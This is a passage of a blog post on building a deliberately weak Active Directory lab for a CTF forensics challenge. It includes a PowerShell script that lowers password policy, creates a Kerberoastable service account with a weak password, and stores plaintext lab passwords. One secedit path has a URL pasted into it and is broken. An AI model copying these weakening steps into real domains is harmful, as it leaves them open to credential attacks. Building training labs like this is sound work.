<!doctype html>
<html lang="en-us">
  <head>
    <title>Creating My First AD Forensics Challenge // Zach&#39;s Blog</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.92.2" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="Zach Wong" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="/css/main.min.a58e9bed6527e990a37775472f2144386fc6ece1b4392c32c803e3ce66b3543a.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Creating My First AD Forensics Challenge"/>
<meta name="twitter:description" content=".toc { margin-top: 10px; display: inline-block; padding: 10px 10px 0 10px; background: #242930; } ul { margin-top: 0; padding-left: 25px; list-style-type: square; }   Content   Introduction So What is Active Directory (AD)? Requirements and Specifications Needed Building the Environment  Installing Active Directory Setting Up Workstations Creating Users &amp; Groups on the Domain Controller Group Policies Creating Workstation 1 Creating Workstation 2   Creating Evidence  Initial Access Privilege Escalation Pivoting Generating Logs   Acquiring the Evidence  Domain Controller Evidence Workstation Evidence   Conclusion    Introduction So Active Directory, we all heard of it, seen it, did a penetration test on it before, but have you ever done digital forensics on it?"/>

    <meta property="og:title" content="Creating My First AD Forensics Challenge" />
<meta property="og:description" content=".toc { margin-top: 10px; display: inline-block; padding: 10px 10px 0 10px; background: #242930; } ul { margin-top: 0; padding-left: 25px; list-style-type: square; }   Content   Introduction So What is Active Directory (AD)? Requirements and Specifications Needed Building the Environment  Installing Active Directory Setting Up Workstations Creating Users &amp; Groups on the Domain Controller Group Policies Creating Workstation 1 Creating Workstation 2   Creating Evidence  Initial Access Privilege Escalation Pivoting Generating Logs   Acquiring the Evidence  Domain Controller Evidence Workstation Evidence   Conclusion    Introduction So Active Directory, we all heard of it, seen it, did a penetration test on it before, but have you ever done digital forensics on it?" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://zachwong02.github.io/post/creating-my-first-ad-forensics-challenge/" /><meta property="article:section" content="post" />
<meta property="article:published_time" content="2023-12-12T21:45:00+08:00" />
<meta property="article:modified_time" content="2023-12-12T21:45:00+08:00" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://zachwong02.github.io"><img class="app-header-avatar" src="/avatar.jpg" alt="Zach Wong" /></a>
      <span class="app-header-title">Zach&#39;s Blog</span>
      <nav class="app-header-menu">
          <a class="app-header-menu-item" href="/">Home</a>
             | 
          
          <a class="app-header-menu-item" href="/tags/">Tags</a>
             | 
          
          <a class="app-header-menu-item" href="/about/">About</a>
      </nav>
      <p>i&#39;m zach and I build labs</p>
      <div class="app-header-social">
        
          <a href="https://github.com/zachwong02" target="_blank" rel="noreferrer noopener me">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
          <a href="https://www.linkedin.com/in/zach-wong-zhi-zhen-a39724173" target="_blank" rel="noreferrer noopener me">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-linkedin">
  <title>Linkedin</title>
  <path d="M16 8a6 6 0 0 1 6 6v7h-4v-7a2 2 0 0 0-2-2 2 2 0 0 0-2 2v7h-4v-7a6 6 0 0 1 6-6z"></path><rect x="2" y="9" width="4" height="12"></rect><circle cx="4" cy="4" r="2"></circle>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Creating My First AD Forensics Challenge</h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Dec 12, 2023
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          25 min read
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-tag">
  <title>tag</title>
  <path d="M20.59 13.41l-7.17 7.17a2 2 0 0 1-2.83 0L2 12V2h10l8.59 8.59a2 2 0 0 1 0 2.82z"></path><line x1="7" y1="7" x2="7.01" y2="7"></line>
</svg>
              <a class="tag" href="https://zachwong02.github.io/tags/purple-teaming/">Purple-Teaming</a>
              <a class="tag" href="https://zachwong02.github.io/tags/lab-creation/">Lab-Creation</a>
              <a class="tag" href="https://zachwong02.github.io/tags/digital-forensics/">Digital-Forensics</a>
              <a class="tag" href="https://zachwong02.github.io/tags/challenge-creation/">Challenge-Creation</a>
        </div>
      </div>
    </header>
    <div class="post-content">
      <style>
    .toc {
        margin-top: 10px;
        display: inline-block;
        padding: 10px 10px 0 10px;
        background: #242930;
    }
    ul {
        margin-top: 0;
        padding-left: 25px;
        list-style-type: square;
    }
</style>

<div class='toc'>
    <b> Content </b>
    <nav id="TableOfContents">
  <ul>
    <li><a href="#introduction">Introduction</a></li>
    <li><a href="#so-what-is-active-directory-ad">So What is Active Directory (AD)?</a></li>
    <li><a href="#requirements-and-specifications-needed">Requirements and Specifications Needed</a></li>
    <li><a href="#building-the-environment">Building the Environment</a>
      <ul>
        <li><a href="#installing-active-directory">Installing Active Directory</a></li>
        <li><a href="#setting-up-workstations">Setting Up Workstations</a></li>
        <li><a href="#creating-users--groups-on-the-domain-controller">Creating Users &amp; Groups on the Domain Controller</a></li>
        <li><a href="#group-policies">Group Policies</a></li>
        <li><a href="#creating-workstation-1">Creating Workstation 1</a></li>
        <li><a href="#creating-workstation-2">Creating Workstation 2</a></li>
      </ul>
    </li>
    <li><a href="#creating-evidence">Creating Evidence</a>
      <ul>
        <li><a href="#initial-access">Initial Access</a></li>
        <li><a href="#privilege-escalation">Privilege Escalation</a></li>
        <li><a href="#pivoting">Pivoting</a></li>
        <li><a href="#generating-logs">Generating Logs</a></li>
      </ul>
    </li>
    <li><a href="#acquiring-the-evidence">Acquiring the Evidence</a>
      <ul>
        <li><a href="#domain-controller-evidence">Domain Controller Evidence</a></li>
        <li><a href="#workstation-evidence">Workstation Evidence</a></li>
      </ul>
    </li>
    <li><a href="#conclusion">Conclusion</a></li>
  </ul>
</nav>
</div>

<h2 id="introduction">Introduction</h2>
<p>So Active Directory, we all heard of it, seen it, did a penetration test on it before, but have you ever done digital forensics on it? Well, I have not, so let’s create a challenge for my university’s <strong>ASEAN Battle of Hackers 2023</strong>! It took one week to setup the environment and test it but no one solved it, so let’s make a blog post and show you how to make the environment!
<br>
</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge.png" alt="uwu"></p>
<br>

<h2 id="so-what-is-active-directory-ad">So What is Active Directory (AD)?</h2>
<p>Active Directory (AD) is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Essentially, Active Directory is like a phone book for a network, containing computers, users, and other resources. It helps in organising and managing these resources efficiently.</p>
<p>Here&rsquo;s a breakdown of its key functions:</p>
<ol>
<li><strong>Centralised Resource Management:</strong> AD provides a centralised place to manage all the resources like user accounts, computers, printers, file shares, and other devices on a network. This makes it easier to control and find resources in a large network.
<br>

<br>
</li>
<li><strong>Authentication and Authorisation:</strong> It is responsible for authenticating and authorising all users and computers within a Windows domain network—ensuring only authorised persons and devices can access network resources. When a user logs in, AD checks the credentials and determines the access level.
<br>

<br>
</li>
<li><strong>Group Policy:</strong> Through AD, administrators can implement specific configurations or policies for users and computers in the network. For example, an admin can set a policy to install certain software automatically on all computers in the network.
<br>

<br>
</li>
<li><strong>Organisational Structure:</strong> AD uses a hierarchical structure to organise information. This hierarchy includes elements like domains, trees, and forests that help in structurally organising and managing a large number of resources.
<br>

<br>
</li>
<li><strong>Replication and Redundancy:</strong> AD automatically replicates data across various domain controllers to ensure data consistency and availability. If one server fails, another can take over, ensuring network stability.
<br>

<br>
</li>
</ol>
<h2 id="requirements-and-specifications-needed">Requirements and Specifications Needed</h2>
<p><img src="/images/creating-my-first-ad-forensics-challenge/96124b1e83b401baf0bc4f3667d7c023.jpg" alt="hmmmm-specifications"></p>
<p>So, before getting into how to setup the <del>damn</del> environment, let’s go through computer specifications. I did this on a computer with 24 cores and 16gb of RAM but you can survive with 8 cores and 16gb of RAM.</p>
<p>Furthermore, according to  <a href="https://bohansec.medium.com/how-to-set-up-an-ad-attack-lab-part-one-493571ebb603">BohanSec&rsquo;s Kerberoasting Lab</a>, it is recommended to use Windows 10 Enterprise but specifically the build 1809 or below because group policies cannot disable Windows Defender even though they are enforced. To download older versions of Windows 10 Server and Enterprise you can go to this <a href="https://tb.rg-adguard.net/public.php">link</a>.</p>
<blockquote>
<p><em>Trust me I spent like 2-3 days wondering why my group policies aren’t working. <strong>PLEASE READ THIS PART.</strong></em></p>
</blockquote>
<br>

<h2 id="building-the-environment">Building the Environment</h2>
<p>Now that the requirements are done with, let’s get into building the actual environment! First off, I would like to thank John Hammond for most of the materials, because for most of the week I was watching his videos on how to script out the whole environment while learning about Active Directory. You can watch his videos on how to setup the foundation of this environment <a href="https://youtube.com/playlist?list=PL1H1sBF1VAKVoU6Q2u7BBGPsnkn-rajlp&amp;si=wgbJqaGgtaXQspCh">here</a>.</p>
<br>

<h3 id="installing-active-directory">Installing Active Directory</h3>
<p>As installing an operating system is easy as baking a cake, I won’t be talking about it here. However, I will share the specific script I used to build the environment which came from John Hammond’s videos. So, if you wanna know how the script works you can watch his videos, but let’s get on with how to setup your domain controller.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-1.png" alt="sconfig"></p>
<p>So when your domain controller has booted up, launch PowerShell and execute this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">sconfig
</code></pre></div><p>This part is just so that you can reset the domain controller’s computer name. As that part is also very simple, I’ll skip what you need to do. After setting a new name for your domain controller, it will prompt you to restart the domain controller, please do so.</p>
<br>

<p>When the domain controller boots back up, time to download Active Directory Feature within Windows. This can be done within PowerShell too by entering this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">Install-WindowsFeature AD-Domain-Services -IncludeManagementTools
</code></pre></div><p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-2.png" alt="downloading-active-directory-services">
<br>

<br>
</p>
<p>After downloading the Windows Feature, you can install Active Directory by entering these commands, also in PowerShell:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">Import-Module ADDSDeployment
Install-ADDSForest
</code></pre></div><p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-3.png" alt="installing-active-directory-services"></p>
<p>When installing Active Directory, the installation will prompt you for a domain name, for our case we’ll just put <code>xyz.com</code>. After that, the installation will ask you for a password, so just provide a password… duh.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-4.png" alt="weeeeeeeee"></p>
<br>

<p>Once you have installed Active Directory, it will prompt you to restart, again. When it boots back up,  you <strong><strong><strong>need</strong></strong></strong> to set your Domain Name Server (DNS) to the domain controller’s IP address. As we’re doing all of these in PowerShell and because I love John Hammond, let’s do it in PowerShell:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell">Get-DnsClientServerAddress
Set-DnsClientServerAddress -InterfaceIndex &lt;NETWORK_INTERFACE&gt; -ServerAddresses &lt;IP_ADDRESS&gt;
</code></pre></div><p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-5.png" alt="setting-dns"></p>
<br>

<h3 id="setting-up-workstations">Setting Up Workstations</h3>
<p>Now that we have a working domain controller we can start pentesting the lab right? RIGHT?? Well, as a lab builder, that’s not fun enough. So, let’s set up some workstations!</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-6.png" alt="surprise"></p>
<br>

<p>So again, installing an operating system is not hard so I’ll skip that part. First things first, <code>ssh</code> is needed for this environment for the pivoting stage. However, <code>ssh</code> client is enabled by default but not <code>ssh</code> server.</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-7.png" alt="apps-and-features"></p>
<p>So, let’s go to <code>Apps &amp; Features</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-8.png" alt="manage-optional-features"></p>
<p>Click on <code>Manage optional features</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-9.png" alt="install-openssh-server"></p>
<p>Click on <code>Add a feature</code> and scroll down until you find <code>OpenSSH Server</code> and install that.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-10.png" alt="find-services"></p>
<p>After <code>OpenSSH Server</code> is installed, go to <code>Services</code> and find the services with <code>OpenSSH</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-11.png" alt="set-automatic-startup"></p>
<p>For both of them, select the startup type to be <code>Automatic</code> and click on <code>Start</code> to start the service.</p>
<blockquote>
<p><em>You can also create an SMB share and make it public for <code>crackmapexec</code> but it was not applicable for the challenge so we’ll skip that.</em></p>
</blockquote>
<br>

<p>After that, set the workstation’s DNS to the domain controller’s IP address. Again, we’ll be using PowerShell to do this:</p>
<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-12.png" alt="set-ws-dns"></p>
<p>After the DNS has been setup, we can connect the workstation to the domain. As a reward for getting this far, you can use the graphical user interface (GUI) for this lmao.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-13.png" alt="searching-access-to-work"></p>
<p>Just search for <code>Access work or school</code> and click on the first result.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-14.png" alt="joining-local-domain"></p>
<p>Then, click on <code>Join this device to a local Active Directory domain</code>.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-15.png" alt="entering-domain-name"></p>
<p>As the DNS has been set, you can just enter the domain name <code>xyz.com</code> to the input field.</p>
<br>

<p><img src="/images/creating-my-first-ad-forensics-challenge/creating-my-first-ad-forensics-challenge-16.png" alt="entering-admin-credentials"></p>
<p>It will then ask you for the Administrator’s password of the domain controller, so just do that and it will ask you to reboot. Also, do that :P</p>
<br>

<h3 id="creating-users--groups-on-the-domain-controller">Creating Users &amp; Groups on the Domain Controller</h3>
<p>Remember when I said I will provide the scripts used? Well here it is! There are comments within the script which are improvements which I discovered after creating this challenge so read it well! You can copy the script and paste it into the domain controller.</p>
<blockquote>
<p><em>Note: both of these scripts must exist and executed within the domain controller</em></p>
</blockquote>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-powershell" data-lang="powershell"><span style="color:#66d9ef">param</span>(
    [<span style="color:#66d9ef">Parameter</span>(<span style="color:#66d9ef">Mandatory</span>=$true)] $JSONFile,
    <span style="color:#66d9ef">[switch]</span>$Revert
)

<span style="color:#66d9ef">function</span> CreateADGroup {
    <span style="color:#66d9ef">param</span> ([<span style="color:#66d9ef">Parameter</span>(<span style="color:#66d9ef">Mandatory</span>=$true)] $groupObject)
    
    $name = $groupObject.name

    New-ADGroup -name $name -GroupScope Global
}

<span style="color:#66d9ef">function</span> RemoveADGroup {
    <span style="color:#66d9ef">param</span> ([<span style="color:#66d9ef">Parameter</span>(<span style="color:#66d9ef">Mandatory</span>=$true)] $groupObject)
    
    $name = $groupObject.name

    Remove-ADGroup -Identity $name -Confirm<span style="color:#960050;background-color:#1e0010">:</span>$false
}

<span style="color:#66d9ef">function</span> WeakenPasswordPolicy() {
    secedit /export /cfg C:\Windows\Tasks\secpol.cfg
    (Get-Content C:\Windows\Tasks\secpol.cfg).replace(<span style="color:#e6db74">&#39;PasswordComplexity = 1&#39;</span>, <span style="color:#e6db74">&#39;PasswordComplexity = 0&#39;</span>).replace(<span style="color:#e6db74">&#39;MinimumPasswordLength = 7&#39;</span>, <span style="color:#e6db74">&#39;MinimumPasswordLength = 1&#39;</span>) | Out-File C:\Windows\Tasks\secpol.cfg
    secedit /configure /db C:\Windows\Security\local.sdb /cfg C:\Windows\Tasks\secpol.cfg /areas SECURITYPOLICY
    rm C:\Windows\Tasks\secpol.cfg -Confirm<span style="color:#960050;background-color:#1e0010">:</span>$false
}
<span style="color:#66d9ef">function</span> StrengthenPasswordPolicy() {
    secedit /export /cfg C:\Windows\Tasks\secpol.cfg
    (Get-Content C:\Windows\Tasks\secpol.cfg).replace(<span style="color:#e6db74">&#39;PasswordComplexity = 0&#39;</span>, <span style="color:#e6db74">&#39;PasswordComplexity = 1&#39;</span>).replace(<span style="color:#e6db74">&#39;MinimumPasswordLength = 1&#39;</span>, <span style="color:#e6db74">&#39;MinimumPasswordLength = 7&#39;</span>) | Out-File C:\Windows\Tasks\secpol.cfg
    secedit /configure /db C:\https<span style="color:#960050;background-color:#1e0010">:</span>//tb.rg-adguard.net/public.phpWindows\Security\local.sdb /cfg C:\Windows\Tasks\secpol.cfg /areas SECURITYPOLICY
    rm C:\Windows\Tasks\secpol.cfg -Confirm<span style="color:#960050;background-color:#1e0010">:</span>$false
}

<span style="color:#66d9ef">function</span> CreateADUser {
    <span style="color:#66d9ef">param</span> ([<span style="color:#66d9ef">Parameter</span>(<span style="color:#66d9ef">Mandatory</span>=$true)] $userObject)
    
    $name = $userObject.name
    $password = $userObject.password
    
    $firstname,$lastname = $name.Split(<span style="color:#e6db74">&#34; &#34;</span>)
    $username = ($firstname[0] + $lastname).ToLower()

    <span style="color:#66d9ef">if</span> ($userObject.kerberoastable) {
        $username = $name
    }

    $SamAccountName = $username
    $principalname = $username

    <span style="color:#75715e"># Creates the AD user account</span>
    New-ADUser -Name <span style="color:#e6db74">&#34;$name&#34;</span> -GivenName $firstname -Surname $lastname -SamAccountName $SamAccountName -UserPrincipalName $principalname@$Global:Domain -AccountPassword (ConvertTo-SecureString $password -AsPlainText -Force) -PassThru | Enable-ADAccount
		
		<span style="color:#75715e"># Should have added this lol</span>
		<span style="color:#75715e"># Set-ADUser -Identity $SamAccountName -LogonWorkstations &lt;COMPUTER_NAME&gt; </span>

    <span style="color:#66d9ef">if</span>($userObject.flag){
    $flag = <span style="color:#66d9ef">[Convert]</span>::ToBase64String(<span style="color:#66d9ef">[System.Text.Encoding]</span>::Unicode.GetBytes(<span style="color:#e6db74">&#34;Wow good job finding me! Here&#39;s one third of the flag &amp; the password: ABOH23{INT3rN : $password&#34;</span>))
        Set-ADUser $principalname -Description $flag
    }

    <span style="color:#66d9ef">if</span>($userObject.kerberoastable){
        $spn = $userObject.kerberoastable.spn
        setspn -a $spn/$username.$Global:Domain $Global:BaseDomain\$username
    } 

    <span style="color:#75715e"># Adds AD user to group</span>
    <span style="color:#66d9ef">foreach</span> ($group_name <span style="color:#66d9ef">in</span> $userObject.groups) {
        
        <span style="color:#66d9ef">try</span> {
            Get-ADGroup -Identity <span style="color:#e6db74">&#34;$group_name&#34;</span>
            Add-ADGroupMember -Identity $group_name -Members $username
        }
        <span style="color:#66d9ef">catch</span> <span style="color:#66d9ef">[Microsoft.ActiveDirectory.Management.ADIdentityNotFoundException]</span>
        {
            Write-Warning <span style="color:#960050;background-color:#1e0010">“</span>User $name NOT added to group $group_name because it does not exist<span style="color:#960050;background-color:#1e0010">”</span>
        }
    }

    $add_command = <span style="color:#e6db74">&#34;net localgroup administrators $Global:Domain\$username /add&#34;</span>
    <span style="color:#66d9ef">foreach</span> ($hostname <span style="color:#66d9ef">in</span> $userObject.local_admin) {
        echo <span style="color:#e6db74">&#34;Invoke-Command -Computer $hostname -ScriptBlock { $add_command }&#34;</span> | Invoke-Expression
    }

}

<span style="color:#66d9ef">function</span> RemoveADUser {
    <span style="color:#66d9ef">param</span> ([<span style="color:#66d9ef">Parameter</span>(<span style="color:#66d9ef">Mandatory</span>=$true)] $userObject)
    
    $name = $userObject.name
    $firstname,$lastname = $name.Split(<span style="color:#e6db74">&#34; &#34;</span>)
    $username = ($firstname[0] + $lastname).ToLower()

    <span style="color:#66d9ef">if</span>($userObject.kerberoastable){
        $username = $name
        setspn -D $spn/$username.$Global:Domain $Global:BaseDomain\$username
    }

    $SamAccountName = $username

    Remove-ADUser -Identity $SamAccountName -Confirm<span style="color:#960050;background-color:#1e0010">:</span>$false
}

$json = (Get-Content $JSONFile | ConvertFrom-Json)
$Global:Domain = $json.domain
$Global:BaseDomain = $Global:Domain.split(<span style="color:#e6db74">&#34;.&#34;</span>)[0]

<span style="color:#66d9ef">if</span> (<span style="color:#f92672">-not</span> $Revert) {
    
    WeakenPasswordPolicy
    
    <span style="color:#66d9ef">foreach</span>($group <span style="color:#66d9ef">in</span> $json.groups){
        CreateADGroup $group
    }
    <span style="color:#66d9ef">foreach</span>($user <span style="color:#66d9ef">in</span> $json.users){
        CreateADUser $user
    }
}<span style="color:#66d9ef">else</span> {
    StrengthenPasswordPolicy

    <span style="color:#66d9ef">foreach</span>($group <span style="color:#66d9ef">in</span> $json.groups){
        RemoveADGroup $group
    }
    <span style="color:#66d9ef">foreach</span>($user <span style="color:#66d9ef">in</span> $json.users){
        RemoveADUser $user
    }
    
}
</code></pre></div><div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-json" data-lang="json">{
    <span style="color:#f92672">&#34;domain&#34;</span>:  <span style="color:#e6db74">&#34;xyz.com&#34;</span>,
    <span style="color:#f92672">&#34;users&#34;</span>:  [
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Developers&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Maryrose Scheid&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;XPGaPb9vhnPd&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Engineers&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Hugh Benak&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;99kEaDdyMnfy&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Developers&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Madalene Maditz&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;gbA5fQrAs7U6&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Engineers&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Gilda Beish&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;CUj7vxCX4MX7&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Developers&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Lesli Litchford&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;rSgb756GX57f&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Developers&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Lulu Rambert&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;EEBgP8qeNq2m&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Engineers&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Spencer Rochin&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;5pWULPtzs3RY&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Student&#34;</span>,
                      <span style="color:#f92672">&#34;flag&#34;</span>: <span style="color:#66d9ef">true</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Krishna Freudenburg&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;t2fkFQjDbeDb&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Employees&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Lindy Kosareff&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;mK8FNyxKAzgc&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Employees&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Roseanne Haldiman&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;TCpZBJK5ezn4&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Developers&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Eddie Sternberger&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;MVw9RSbBc7Hc&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Employees&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Serita Potratz&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;fSMsaz5E9uVX&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Developers&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Harriett Friar&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;DRsFqvt2zj2k&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Engineers&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Renda Tigg&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;SzRVn6cERCg7&#34;</span>
                  },
                  {
                      <span style="color:#f92672">&#34;groups&#34;</span>:  <span style="color:#e6db74">&#34;Employees&#34;</span>,
                      <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Lucrecia Koellmann&#34;</span>,
                      <span style="color:#f92672">&#34;password&#34;</span>:  <span style="color:#e6db74">&#34;AqzBgBjD9mPv&#34;</span>
                  },
                  {
                    <span style="color:#f92672">&#34;name&#34;</span>: <span style="color:#e6db74">&#34;http_svc&#34;</span>,
                    <span style="color:#f92672">&#34;password&#34;</span>: <span style="color:#e6db74">&#34;ihatepeople&#34;</span>,
                    <span style="color:#f92672">&#34;kerberoastable&#34;</span>: {
                        <span style="color:#f92672">&#34;spn&#34;</span>:<span style="color:#e6db74">&#34;http&#34;</span>
                    }
                  }
              ],
    <span style="color:#f92672">&#34;groups&#34;</span>:  [
                   {
                       <span style="color:#f92672">&#34;name&#34;</span>:  <span style="color:#e6db74">&#34;Engineers&#34;</span>
                   },
                   {
